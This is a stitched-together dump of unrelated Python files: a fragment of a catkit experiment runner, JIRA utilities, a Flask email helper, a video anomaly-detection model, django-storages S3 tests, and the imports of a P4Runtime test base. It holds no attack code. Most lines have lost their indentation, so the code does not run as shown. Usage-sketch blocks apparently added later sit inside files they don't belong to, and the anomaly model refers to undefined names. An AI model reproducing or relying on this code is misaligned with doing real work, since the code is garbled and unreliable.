# NOTE: self.stop_event is set upon a safety check failure as well as self.safety_event, so waiting on
# self.stop_event is effectively waiting on self.safety_event also.
self.stop_event.wait()
finally:
# NOTE: This event monitor can be killed WITHOUT raising SIGINT (as it does below) by setting
# self._kill_event_monitor_event BEFORE setting self.stop_event.
if self._kill_event_monitor_event.is_set():
return
# Interrupt the main thread with a KeyboardInterrupt exception.
raise_signal(signal.SIGINT)
def run_experiment(self):
""" Code executed on the child process. """
self.init_log()
data_log_writer = None
if not self.disable_shared_memory:
# Check that we can connect from the child process.
self.exception_manager = SharedMemoryManager(address=EXCEPTION_SERVER_ADDRESS, own=False)
self.exception_manager.connect() # Needs to have already been started.
self.stop_event = self.exception_manager.get_event(STOP_EVENT)
self.safety_event = self.exception_manager.get_event(SAFETY_EVENT)
self._event_monitor_barrier = threading.Barrier(parties=2, timeout=DEFAULT_TIMEOUT)
self._kill_event_monitor_event = threading.Event()
monitor_thread = threading.Thread(target=self.event_monitor, daemon=True)
monitor_thread.start()
try:
try: # Catches SIGINT issued, using _thread.interrupt_main(), by the event_monitor.
self._event_monitor_barrier.wait() # Wait for the monitor_thread to be ready.
# Set up data log writer
data_logger_path = os.path.join(self.output_path, self.name.replace(" ", "_").lower() + "_data_logger")
data_log_writer = datalogging.DataLogWriter(data_logger_path)
datalogging.DataLogger.add_writer(data_log_writer)
# Run pre-experiment code, e.g., open devices, run calibrations, etc.
self.log.info(f"'{self.__class__.__name__}': Experiment.pre_experiment() running...")
self.pre_experiment_return = self.pre_experiment()
self.log.info(f"'{self.__class__.__name__}': Experiment.pre_experiment() completed.")
# Run the core experiment.
self.log.info(f"'{self.__class__.__name__}': Experiment.experiment() running...")
self.experiment_return = self.experiment()
self.log.info(f"'{self.__class__.__name__}': Experiment.experiment() completed.")
# Run any post-experiment analysis, etc.
self.log.info(f"'{self.__class__.__name__}': Experiment.post_experiment() running...")
self.post_experiment_return = self.post_experiment()
self.log.info(f"'{self.__class__.__name__}': Experiment.post_experiment() completed.")
except KeyboardInterrupt:
if self.safety_event.is_set():
raise SafetyException(f"'{self.__class__.__name__}': Event monitor detected a SAFETY event before experiment completed (join root experiment and/or call teardown to retrieve safety exception).")
elif self.stop_event.is_set():
raise StopException(f"'{self.__class__.__name__}': Event monitor detected a STOP event before experiment completed (join root experiment and/or call teardown to retrieve safety exception).")
else:
# An actual ctrl-c like interrupt occurred.
raise
except (Exception, KeyboardInterrupt): # KeyboardInterrupt inherits from BaseException not Exception.
self.log.exception(f"'{self.__class__.__name__}': Exception caught during Experiment.run_experiment().")
if self.stop_all_on_exception:
                # NOTE: When an exception is raised by the experiment and NOT by the event monitor we now want to
                # kill the event monitor without it calling _thread.interrupt_main(). We do this by setting
                # self._kill_event_monitor_event BEFORE setting self.stop_event. Otherwise, setting stop_event would
# cause the event monitor to call _thread.interrupt_main() thus killing the main child thread, possibly
# before Process.run has a chance to set the exception on the exception manager server.
self._kill_event_monitor_event.set()
self.set_all_events()
raise
finally:
# Stop the event monitor.
self._kill_event_monitor_event.set()
# Release data log writer
if data_log_writer:
datalogging.DataLogger.remove_writer(data_log_writer)
data_log_writer.close()
def pre_experiment(self, *args, **kwargs):
""" This is called immediately BEFORE self.experiment(). """
pass
def experiment(self, *args, **kwargs):
""" This is where the experiment gets implemented. All concrete child classes must implement this. """
def post_experiment(self, *args, **kwargs):
""" This is called immediately AFTER self.experiment(). """
pass
def init_path(self):
""" Set up experiment output. """
pass
def init_log(self):
""" Initialize log writing. """
pass
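# Hedged usage sketch (the class names below are illustrative, not part of catkit):
# subclass Experiment and implement experiment(), then run it inside a Testbed
# context so the shared-memory servers and the safety monitor are active while
# the experiment process runs.
class _ExampleSafetyTest(SafetyTest):
    def check(self):
        pass  # a real test would raise SafetyException on an unsafe condition

class _ExampleExperiment(Experiment):
    def experiment(self, *args, **kwargs):
        self.log.info("example experiment body running")

if __name__ == "__main__":
    with Testbed(safety_tests=[_ExampleSafetyTest]):
        with _ExampleExperiment():
            pass  # __exit__ joins the child experiment process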
|
__init__.py
|
# -*- coding: utf-8 -*-
"""JIRA utils used internally."""
import threading
from jira.resilientsession import raise_on_error
class CaseInsensitiveDict(dict):
"""A case-insensitive ``dict``-like object.
Implements all methods and operations of
``collections.MutableMapping`` as well as dict's ``copy``. Also
provides ``lower_items``.
All keys are expected to be strings. The structure remembers the
case of the last key to be set, and ``iter(instance)``,
``keys()``, ``items()``, ``iterkeys()``
will contain case-sensitive keys. However, querying and contains
testing is case insensitive::
cid = CaseInsensitiveDict()
cid['Accept'] = 'application/json'
cid['accept'] == 'application/json' # True
list(cid) == ['Accept'] # True
For example, ``headers['content-encoding']`` will return the
value of a ``'Content-Encoding'`` response header, regardless
of how the header name was originally stored.
If the constructor, ``.update``, or equality comparison
operations are given keys that have equal ``.lower()``s, the
behavior is undefined.
"""
def __init__(self, *args, **kw):
super(CaseInsensitiveDict, self).__init__(*args, **kw)
upper_keys_list = []
for key in super(CaseInsensitiveDict, self).keys():
if key != key.lower():
upper_keys_list.append(key)
for upper_key in upper_keys_list:
self[upper_key.lower()] = self[upper_key]
self.pop(upper_key, None)
def __setitem__(self, key, value):
"""Overwrite [] implementation."""
super(CaseInsensitiveDict, self).__setitem__(key.lower(), value)
# def __iter__(self):
# return iter(self.itemlist)
# def keys(self):
# return self.itemlist
# def values(self):
# return [self[key] for key in self]
# def itervalues(self):
# return (self[key] for key in self)
def threaded_requests(requests):
for fn, url, request_args in requests:
th = threading.Thread(target=fn, args=(url,), kwargs=request_args, name=url)
th.start()
for th in threading.enumerate():
if th.name.startswith("http"):
th.join()
def json_loads(r):
raise_on_error(r)
try:
return r.json()
except ValueError:
# json.loads() fails with empty bodies
if not r.text:
return {}
raise
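# Hedged usage sketch for threaded_requests (the URLs and fetch helper below are
# illustrative, and the `requests` library is assumed to be available): each item
# is (callable, url, kwargs); one thread per request is started, and every thread
# whose name starts with "http" is joined before returning.
if __name__ == "__main__":
    import requests

    results = {}

    def fetch(url, timeout=10):
        results[url] = requests.get(url, timeout=timeout).status_code

    threaded_requests([
        (fetch, "https://example.com/a", {"timeout": 5}),
        (fetch, "https://example.com/b", {}),
    ])
    print(results)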
|
email.py
|
#!/usr/bin/env python3
# encoding: utf-8
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
    msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
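# Hedged usage sketch: the recipient, token, and 'auth/email/confirm' template
# name below are illustrative and assume matching .txt/.html templates exist.
# send_email must be called with a Flask application context available (e.g.
# from a request handler); it returns the background Thread so callers can
# join it in tests.
def _example_confirmation_email(user, token):
    return send_email(user.email, 'Confirm Your Account',
                      'auth/email/confirm', user=user, token=token)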
|
model_v2.py
|
# -*- coding: utf-8 -*-
"""Model V2.0.ipynb
Written by : Aditya, Nikhil
"""
###################### Importing Libraries ###################################
import numpy as np
import matplotlib.pyplot as plt
import cv2
import os
from tqdm import tqdm
import time
import tensorflow as tf
from tensorflow.keras.models import Sequential, load_model
from tensorflow.keras.layers import ConvLSTM2D,Conv2DTranspose, LayerNormalization, BatchNormalization, TimeDistributed, Conv2D, Flatten, Dense, Dropout
import keras
import concurrent.futures
import re
import pprint
from multiprocessing import Process
###################### copy the data in the gpu memory step by step ####################
physical_devices = tf.config.list_physical_devices('GPU')
tf.config.experimental.set_memory_growth(physical_devices[0], True)
###################### Parameter Initialization ########################################
class Config():
def __init__(self, test_path, model_path, result_pth, train_path = None, img_size = (128, 128), batch_size = 8, mx_frm = 1600, stride = [1, 2], frm_cnt = 10, test_size = 400, epochs = 10, tst_seq = 300):
self.train_path = train_path
self.test_path = test_path
self.img_size = img_size
self.batch_size = batch_size
self.model_path = model_path
self.epochs = epochs
self.result_pth = result_pth
self.stride = stride
self.mx_frm = mx_frm
self.frm_cnt = frm_cnt
self.test_size = test_size
self.tst_seq = tst_seq
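# Hedged example (the paths below are placeholders, not the project's real ones)
# annotating what each terse Config parameter controls, based on how the fields
# are used further down in this file.
_example_cnfg = Config(
    test_path='Test',              # directory containing test videos
    model_path='model.h5',         # where the model weights live
    result_pth='result.txt',       # text file the detector writes its verdict to
    img_size=(128, 128),           # frame size fed to the network
    batch_size=8,                  # clips per training batch
    mx_frm=1600,                   # maximum frames loaded from a single video
    stride=[1, 2],                 # temporal strides used for augmentation
    frm_cnt=10,                    # frames per clip/sequence
    tst_seq=300)                   # frames gathered before each live evaluation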
##################### Class Preprocessing Functions ###########################################
class Functions(Config):
def __init__(self):
        # Config expects (test_path, model_path, result_pth, ...); train_path is optional and defaults to None.
        Config.__init__(self, test_path, model_path, result_pth)
# load buffer :- frm_cnt : stores the no of frames already loaded of the current video (None represents end of current video)
# indx : stores the indx of the video which is being processed / being loaded
        # total : stores the number of videos loaded so far.
self.load_buffer = {'frm_cnt': None, 'indx':0, 'total':0}
def load_batch(self):
'''
DOCTYPE : This function will load the training videos in a batch of size defined in class Config.
Input : None
        output : Batch of augmented and processed clips, Total no of videos loaded
'''
clips = []
a = 0
q = 0
for dir in tqdm(os.walk(train_path)):
            # os.walk() yields (dirpath, dirnames, filenames) tuples; the first entry is the top-level directory
            # itself, and we only want the files inside its subdirectories, so skip the first iteration.
a += 1
if a == 1:
continue
try:
                # If the frame count is None or zero, all frames of the previous video have been loaded, so move on to the next video.
if not self.load_buffer['frm_cnt']:
self.load_buffer['indx'] += 1
self.load_buffer['total'] += 1
# Produced clips according to the load buffer indx.
pth = os.path.join(dir[0], sorted(dir[2])[self.load_buffer['indx']])
clips.append(self.load_frames(pth))
except Exception as e:
print(e)
# The training directory contains two folders so this step will start loading the videos from next directory.
self.load_buffer['indx'] = 0
continue
break
return clips, self.load_buffer['total']
def load_frames(self, pth, agmt = True):
'''
DOCTYPE : This function will load a set of frame sequences from a given video.
Input = pth - path of the video, agmt - True (Will apply augmentation) / False (will not apply augmentation)
output = numpy array of frame sequences
'''
video = cv2.VideoCapture(pth)
print('\n starting video no : ',self.load_buffer['total'])
frames = []
cnt = 0
        while video.isOpened():
ret, frame = video.read()
cnt += 1
# If there is any error in loading the next frame. Might be because of ending of the video.
if not ret:
print('\nTotal frames read', cnt)
self.load_buffer['frm_cnt'] = None
print("\nvideo finished.")
break
# If frm_cnt exists then the previous video was not loaded completely and it will continue the previous sequence.
if self.load_buffer['frm_cnt']:
if self.load_buffer['frm_cnt'] <= cnt:
img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frame = cv2.resize(img/256, self.img_size)
else:
continue
# If frm_cnt is None then it will start loading the videos from 1st frame.
else:
img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frame = cv2.resize(img/256, self.img_size)
#print('frame shape = ', frame.shape)
frames.append(frame.reshape([self.img_size[0], self.img_size[1], 1]))
# Specifies the maximum no of frames to be loaded
if len(frames) >= self.mx_frm:
break
# update the frm_cnt variable according to whether the video is completed or not.
if ret:
self.load_buffer['frm_cnt'] = cnt
else:
self.load_buffer['frm_cnt'] = None
video.release()
        # If the number of frames loaded is less than the number of frames required for a sequence, dump that sequence.
        if len(frames) < self.frm_cnt:
            print('video has insufficient frames')
            self.load_buffer['frm_cnt'] = None
            raise ValueError('video has insufficient frames')
# Perform Augmentation
if agmt:
frames = self.augment(frames)
return np.array(frames)
    def augment(self, frames):
        '''
        DOCTYPE : This function will augment the frames according to the time series strides specified in the Config class.
        Input : Sequence of frames.
        Output : Augmented sequence of frames.
        '''
        clips = []
        try:
            for strd in self.stride:
                for s in range(0, len(frames), strd):
                    if len(frames[s:s + self.frm_cnt]) == self.frm_cnt:
                        # Copy into a fresh buffer each time; reusing one array would
                        # make every clip point at the same (last) data.
                        agmted = np.zeros((self.frm_cnt, self.img_size[0], self.img_size[1], 1))
                        agmted[:, :, :, :] = frames[s:s + self.frm_cnt]
                        clips.append(agmted)
        except Exception as error:
            print('Error occurred in augment:', error)
        # Drop the remainder so the clip count is a multiple of the batch size.
        no = len(clips) % self.batch_size
        print("clips dropped ", no)
        clips = clips[:len(clips) - no]
        return clips
def load_single_test(self):
test = np.zeros((self.test_size, self.img_size[0], self.img_size[1], 1))
for dir in os.listdir(self.test_path):
path = os.path.join(self.test_path, dir)
frames = self.load_frames(path, agmt = False)
test = frames[0:self.test_size]
del frames
return test
####################### Model Architecture ##################################
class Model(Functions):
def __init__(self):
Functions.__init__(self)
self.output1 = None
self.output = None
def anom(self):
inputs = tf.keras.layers.Input(shape=[self.frm_cnt, self.img_size[0], self.img_size[1], 1])
encode = [
self.spatial(64, (5,5), stride = 2, pading="same", cnv=True),
self.temporal(64, (3,3), pading='same'),
self.temporal(32, (3,3), pading='same')
]
decode = [
self.temporal(64, (3,3), pading='same'),
self.spatial(64,(5,5), stride = 2, pading="same", cnv = False),
self.spatial(128, (11,11), stride= 2, pading="same", cnv= False)
]
seq = tf.keras.Sequential()
x = TimeDistributed(Conv2D(128, (11, 11), strides=4, padding="same"), batch_input_shape=(None, self.frm_cnt, self.img_size[0], self.img_size[1], 1))(inputs)
x = LayerNormalization()(x)
for enc in encode:
x = enc(x)
self.output1 = x
for dec in decode:
x = dec(x)
output = TimeDistributed(Conv2D(1, (11, 11), activation="sigmoid", padding="same"))(x)
return tf.keras.Model(inputs=inputs, outputs = output)
    def spatial(self, filters, filter_size, stride, cnv=True, pading="same"):
seq = tf.keras.Sequential()
if cnv:
seq.add(TimeDistributed(Conv2D(filters, filter_size, padding=pading)))
else:
seq.add(TimeDistributed(Conv2DTranspose(filters, filter_size, strides=stride, padding=pading)))
seq.add(LayerNormalization())
return seq
def temporal(self, filters, filter_size, pading = "same", return_sequence=True):
seq = tf.keras.Sequential()
seq.add(ConvLSTM2D(filters, filter_size, padding=pading, return_sequences=return_sequence))
seq.add(LayerNormalization())
return seq
def anom_type(self):
seq = Sequential()
seq.add(Flatten())
seq.add(Dense(1000, activation='relu'))
seq.add(Dropout(0.5))
seq.add(Dense(512, activation='relu'))
seq.add(Dropout(0.4))
seq.add(Dense(128, activation='relu'))
seq.add(Dropout(0.5))
seq.add(Dense(13, activation='softmax'))
return seq
def evaluate(test, typ):
'''
    DOCTYPE : This function is used to return the result of the anomaly detection algorithm.
    Input : A video sequence to check
    Output : Writes the model's prediction to a txt file
'''
sz = test.shape[0] // 10
sequences = np.zeros((sz, 10, img_dim[0], img_dim[1], 1))
# apply the sliding window technique to get the sequences
cnt = 0
for i in range(0, test.shape[0], 10):
if i + 10 <= test.shape[0]:
sequences[cnt, :, :, :, :] = test[i:i+10]
cnt += 1
test = None
clip = None
# get the reconstruction cost of all the sequences
reconstructed_sequences = model.predict(sequences,batch_size=4)
sequences_reconstruction_cost = np.array([np.linalg.norm(np.subtract(sequences[i],reconstructed_sequences[i])) for i in range(0,sz)])
sa = (sequences_reconstruction_cost - np.min(sequences_reconstruction_cost)) / np.max(sequences_reconstruction_cost)
sr = 1.0 - sa
while True:
try:
fle = open(cnfg.result_pth, 'w')
break
except:
time.sleep(0.001)
print('file is busy')
continue
flag = 0
length = len(sr)
ct = 0
for i in sr:
if i <= 0.96:
ct += 1
            # Flag an anomaly once at least 30% of the sequences fall below the threshold.
            if (ct / length) >= 0.3:
                flag = 1
if flag:
fle.write(typ)
print('detected anomaly')
# if (sr<=0.96).any() or (sr<=0.96).all():
# fle.write(typ)
# print('detected anomaly')
else:
fle.write('Normal')
print('Normal')
fle.close()
# #plot the regularity scores
# print(sr)
# plt.plot(sr)
# plt.ylabel('regularity score Sr(t)')
# plt.xlabel('frame t')
# plt.show()
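# Hedged illustration (synthetic numbers, not model output) of the regularity
# score computed in evaluate() above: per-sequence reconstruction costs are
# min-shifted, scaled by the maximum cost, and inverted, so values close to 1.0
# mean the sequence reconstructs well (i.e. looks "normal").
def _example_regularity_scores():
    costs = np.array([3.1, 3.0, 9.5, 3.2])        # example reconstruction costs per sequence
    sa = (costs - np.min(costs)) / np.max(costs)   # abnormality score, same formula as evaluate()
    sr = 1.0 - sa                                  # regularity score; low values flag anomalies
    return sr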
def play2(pth):
time.sleep(7)
vid = cv2.VideoCapture(pth)
while vid.isOpened():
ret, frame = vid.read()
if not ret:
break
frame = cv2.resize(frame,(512,512))
cv2.imshow('vid', frame)
if cv2.waitKey(30) & 0xFF == ord('q'):
break
vid.release()
cv2.destroyAllWindows()
def strt_eval(argmt):
'''
DOCTYPE : This function will start sequence processing
'''
frm = argmt[0]
typ = argmt[1]
frames = np.array(frm).reshape((cnfg.tst_seq, img_dim[0], img_dim[1], 1))
evaluate(frames, typ)
return 1
def test(test_path):
'''
DOCTYPE : Load the test video from test directory.
Input : path of test Dir
output : play the video in real time along with the analysis algorithm.
'''
for pth in os.listdir(test_path):
tst_pth = os.path.join(test_path, pth)
frames = []
vid = cv2.VideoCapture(tst_pth)
n = 0
        p0 = Process(target=play2, args=(tst_pth,))
p0.start()
while vid.isOpened():
ret, frame = vid.read()
if not ret:
break
n+= 1
time.sleep(0.030)
frm = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frm = cv2.resize(frm/256, img_dim)
frames.append(frm.reshape((img_dim[0],img_dim[1], 1)))
if n%cnfg.tst_seq == 0:
print(n)
temp = re.split(r'(\d+)', pth)[0]
frames = np.array(frames).reshape((cnfg.tst_seq, img_dim[0], img_dim[1], 1))
evaluate(frames,temp)
# n = 0
frames =[]
p0.join()
vid.release()
cv2.destroyAllWindows()
while True:
try:
            fle = open(cnfg.result_pth, 'w')
break
except:
time.sleep(0.001)
print('file is busy')
continue
fle.write('Video finished')
fle.close()
if __name__ == '__main__':
model_path = 'model_weights/anomaly_detect.h5'
result_pth = 'IRIS_WEB/IRIS-backend/public/text_files/text.txt'
test_path = 'Test'
cnfg = Config(test_path, model_path,result_pth, tst_seq = 300)
fncn = Functions()
mdl = Model()
img_dim = (128, 128)
model = mdl.anom()
    model.compile(loss='mse', experimental_steps_per_execution=50, optimizer=tf.keras.optimizers.Adam(lr=1e-4, decay=1e-5, epsilon=1e-6))
try:
model.load_weights('Model/tpu_model.h5')
        print('Model loaded successfully')
    except Exception as error:
        print("couldn't load the weights:", error)
# model = load_mdl()
test(test_path)
# test= fncn.load_single_test()
# evaluate(test,'Abuse')
|
test_s3boto3.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import gzip
import threading
from datetime import datetime
from unittest import skipIf
from botocore.exceptions import ClientError
from django.conf import settings
from django.core.files.base import ContentFile
from django.test import TestCase
from django.utils.six.moves.urllib import parse as urlparse
from django.utils.timezone import is_aware, utc
from storages.backends import s3boto3
try:
from unittest import mock
except ImportError: # Python 3.2 and below
import mock
class S3Boto3TestCase(TestCase):
def setUp(self):
self.storage = s3boto3.S3Boto3Storage()
self.storage._connections.connection = mock.MagicMock()
class S3Boto3StorageTests(S3Boto3TestCase):
def test_clean_name(self):
"""
Test the base case of _clean_name
"""
path = self.storage._clean_name("path/to/somewhere")
self.assertEqual(path, "path/to/somewhere")
def test_clean_name_normalize(self):
"""
Test the normalization of _clean_name
"""
path = self.storage._clean_name("path/to/../somewhere")
self.assertEqual(path, "path/somewhere")
def test_clean_name_trailing_slash(self):
"""
Test the _clean_name when the path has a trailing slash
"""
path = self.storage._clean_name("path/to/somewhere/")
self.assertEqual(path, "path/to/somewhere/")
def test_clean_name_windows(self):
"""
        Test the _clean_name when the path contains Windows-style backslashes
"""
path = self.storage._clean_name("path\\to\\somewhere")
self.assertEqual(path, "path/to/somewhere")
def test_storage_url_slashes(self):
"""
Test URL generation.
"""
self.storage.custom_domain = 'example.com'
# We expect no leading slashes in the path,
# and trailing slashes should be preserved.
self.assertEqual(self.storage.url(''), 'https://example.com/')
self.assertEqual(self.storage.url('path'), 'https://example.com/path')
self.assertEqual(self.storage.url('path/'), 'https://example.com/path/')
self.assertEqual(self.storage.url('path/1'), 'https://example.com/path/1')
self.assertEqual(self.storage.url('path/1/'), 'https://example.com/path/1/')
def test_storage_save(self):
"""
Test saving a file
"""
name = 'test_storage_save.txt'
content = ContentFile('new content')
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'text/plain',
'ACL': self.storage.default_acl,
}
)
def test_storage_save_gzipped(self):
"""
Test saving a gzipped file
"""
name = 'test_storage_save.gz'
content = ContentFile("I am gzip'd")
self.storage.save(name, content)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content.file,
ExtraArgs={
'ContentType': 'application/octet-stream',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
def test_storage_save_gzip(self):
"""
Test saving a file with gzip enabled.
"""
self.storage.gzip = True
name = 'test_storage_save.css'
content = ContentFile("I should be gzip'd")
self.storage.save(name, content)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
mock.ANY,
ExtraArgs={
'ContentType': 'text/css',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
args, kwargs = obj.upload_fileobj.call_args
content = args[0]
zfile = gzip.GzipFile(mode='rb', fileobj=content)
self.assertEqual(zfile.read(), b"I should be gzip'd")
def test_storage_save_gzip_twice(self):
"""
Test saving the same file content twice with gzip enabled.
"""
# Given
self.storage.gzip = True
name = 'test_storage_save.css'
content = ContentFile("I should be gzip'd")
# When
self.storage.save(name, content)
self.storage.save('test_storage_save_2.css', content)
# Then
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
mock.ANY,
ExtraArgs={
'ContentType': 'text/css',
'ContentEncoding': 'gzip',
'ACL': self.storage.default_acl,
}
)
args, kwargs = obj.upload_fileobj.call_args
content = args[0]
zfile = gzip.GzipFile(mode='rb', fileobj=content)
self.assertEqual(zfile.read(), b"I should be gzip'd")
def test_compress_content_len(self):
"""
Test that file returned by _compress_content() is readable.
"""
self.storage.gzip = True
content = ContentFile("I should be gzip'd")
content = self.storage._compress_content(content)
self.assertTrue(len(content.read()) > 0)
def test_storage_open_write(self):
"""
Test opening a file in write mode
"""
name = 'test_open_for_writïng.txt'
content = 'new content'
# Set the encryption flag used for multipart uploads
self.storage.encryption = True
self.storage.reduced_redundancy = True
self.storage.default_acl = 'public-read'
file = self.storage.open(name, 'w')
self.storage.bucket.Object.assert_called_with(name)
obj = self.storage.bucket.Object.return_value
# Set the name of the mock object
obj.key = name
file.write(content)
obj.initiate_multipart_upload.assert_called_with(
ACL='public-read',
ContentType='text/plain',
ServerSideEncryption='AES256',
StorageClass='REDUCED_REDUNDANCY'
)
# Save the internal file before closing
multipart = obj.initiate_multipart_upload.return_value
multipart.parts.all.return_value = [mock.MagicMock(e_tag='123', part_number=1)]
file.close()
multipart.Part.assert_called_with(1)
part = multipart.Part.return_value
part.upload.assert_called_with(Body=content.encode('utf-8'))
multipart.complete.assert_called_once_with(
MultipartUpload={'Parts': [{'ETag': '123', 'PartNumber': 1}]})
def test_auto_creating_bucket(self):
self.storage.auto_create_bucket = True
Bucket = mock.MagicMock()
self.storage._connections.connection.Bucket.return_value = Bucket
self.storage._connections.connection.meta.client.meta.region_name = 'sa-east-1'
Bucket.meta.client.head_bucket.side_effect = ClientError({'Error': {},
'ResponseMetadata': {'HTTPStatusCode': 404}},
'head_bucket')
self.storage._get_or_create_bucket('testbucketname')
Bucket.create.assert_called_once_with(
ACL='public-read',
CreateBucketConfiguration={
'LocationConstraint': 'sa-east-1',
}
)
def test_storage_exists(self):
self.assertTrue(self.storage.exists("file.txt"))
self.storage.connection.meta.client.head_object.assert_called_with(
Bucket=self.storage.bucket_name,
Key="file.txt",
)
def test_storage_exists_false(self):
self.storage.connection.meta.client.head_object.side_effect = ClientError(
{'Error': {'Code': '404', 'Message': 'Not Found'}},
'HeadObject',
)
self.assertFalse(self.storage.exists("file.txt"))
self.storage.connection.meta.client.head_object.assert_called_with(
Bucket=self.storage.bucket_name,
Key='file.txt',
)
def test_storage_exists_doesnt_create_bucket(self):
with mock.patch.object(self.storage, '_get_or_create_bucket') as method:
self.storage.exists('file.txt')
method.assert_not_called()
def test_storage_delete(self):
self.storage.delete("path/to/file.txt")
self.storage.bucket.Object.assert_called_with('path/to/file.txt')
self.storage.bucket.Object.return_value.delete.assert_called_with()
def test_storage_listdir_base(self):
file_names = ["some/path/1.txt", "2.txt", "other/path/3.txt", "4.txt"]
result = []
for p in file_names:
obj = mock.MagicMock()
obj.key = p
result.append(obj)
self.storage.bucket.objects.filter.return_value = iter(result)
dirs, files = self.storage.listdir("")
self.storage.bucket.objects.filter.assert_called_with(Prefix="")
self.assertEqual(len(dirs), 2)
for directory in ["some", "other"]:
self.assertTrue(directory in dirs,
""" "%s" not in directory list "%s".""" % (
directory, dirs))
self.assertEqual(len(files), 2)
for filename in ["2.txt", "4.txt"]:
self.assertTrue(filename in files,
""" "%s" not in file list "%s".""" % (
filename, files))
def test_storage_listdir_subdir(self):
file_names = ["some/path/1.txt", "some/2.txt"]
result = []
for p in file_names:
obj = mock.MagicMock()
obj.key = p
result.append(obj)
self.storage.bucket.objects.filter.return_value = iter(result)
dirs, files = self.storage.listdir("some/")
self.storage.bucket.objects.filter.assert_called_with(Prefix="some/")
self.assertEqual(len(dirs), 1)
self.assertTrue('path' in dirs,
""" "path" not in directory list "%s".""" % (dirs,))
self.assertEqual(len(files), 1)
self.assertTrue('2.txt' in files,
""" "2.txt" not in files list "%s".""" % (files,))
def test_storage_size(self):
obj = self.storage.bucket.Object.return_value
obj.content_length = 4098
name = 'file.txt'
self.assertEqual(self.storage.size(name), obj.content_length)
def test_storage_mtime(self):
# Test both USE_TZ cases
for use_tz in (True, False):
with self.settings(USE_TZ=use_tz):
self._test_storage_mtime(use_tz)
def _test_storage_mtime(self, use_tz):
obj = self.storage.bucket.Object.return_value
obj.last_modified = datetime.now(utc)
name = 'file.txt'
self.assertFalse(
is_aware(self.storage.modified_time(name)),
'Naive datetime object expected from modified_time()'
)
self.assertIs(
settings.USE_TZ,
is_aware(self.storage.get_modified_time(name)),
'%s datetime object expected from get_modified_time() when USE_TZ=%s' % (
('Naive', 'Aware')[settings.USE_TZ],
settings.USE_TZ
)
)
def test_storage_url(self):
name = 'test_storage_size.txt'
url = 'http://aws.amazon.com/%s' % name
self.storage.bucket.meta.client.generate_presigned_url.return_value = url
self.storage.bucket.name = 'bucket'
self.assertEqual(self.storage.url(name), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=self.storage.querystring_expire
)
custom_expire = 123
self.assertEqual(self.storage.url(name, expire=custom_expire), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=custom_expire
)
def test_generated_url_is_encoded(self):
self.storage.custom_domain = "mock.cloudfront.net"
filename = "whacky & filename.mp4"
url = self.storage.url(filename)
parsed_url = urlparse.urlparse(url)
self.assertEqual(parsed_url.path,
"/whacky%20%26%20filename.mp4")
self.assertFalse(self.storage.bucket.meta.client.generate_presigned_url.called)
def test_special_characters(self):
self.storage.custom_domain = "mock.cloudfront.net"
name = "ãlöhâ.jpg"
content = ContentFile('new content')
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
url = self.storage.url(name)
parsed_url = urlparse.urlparse(url)
self.assertEqual(parsed_url.path, "/%C3%A3l%C3%B6h%C3%A2.jpg")
def test_strip_signing_parameters(self):
expected = 'http://bucket.s3-aws-region.amazonaws.com/foo/bar'
self.assertEqual(self.storage._strip_signing_parameters(
'%s?X-Amz-Date=12345678&X-Amz-Signature=Signature' % expected), expected)
self.assertEqual(self.storage._strip_signing_parameters(
'%s?expires=12345678&signature=Signature' % expected), expected)
@skipIf(threading is None, 'Test requires threading')
def test_connection_threading(self):
connections = []
def thread_storage_connection():
connections.append(self.storage.connection)
for x in range(2):
t = threading.Thread(target=thread_storage_connection)
t.start()
t.join()
# Connection for each thread needs to be unique
self.assertIsNot(connections[0], connections[1])
|
base_test.py
|
# Copyright 2013-2020 Barefoot Networks, Inc.
# Copyright 2020-2021 Open Networking Foundation
# Copyright 2021-present Princeton University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Antonin Bas (antonin@barefootnetworks.com)
# Carmelo Cascone (carmelo@opennetworking.org)
#
import logging
# https://stackoverflow.com/questions/24812604/hide-scapy-warning-message-ipv6
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import itertools
import queue
import sys
import threading
import time
from io import StringIO
from functools import wraps, partial
from unittest import SkipTest
import grpc
import ptf
import scapy.packet
import scapy.utils
from google.protobuf import text_format
from google.rpc import status_pb2, code_pb2
from ipaddress import ip_address
from p4.config.v1 import p4info_pb2
from p4.v1 import p4runtime_pb2, p4runtime_pb2_grpc
from ptf import config
from ptf import testutils as testutils
from ptf.base_tests import BaseTest
from ptf.dataplane import match_exp_pkt
from ptf.packet import IP
from scapy.layers.inet6 import *
from scapy.layers.l2 import Ether
from scapy.pton_ntop import inet_pton, inet_ntop
from scapy.utils6 import in6_getnsma, in6_getnsmac
from helper import P4InfoHelper
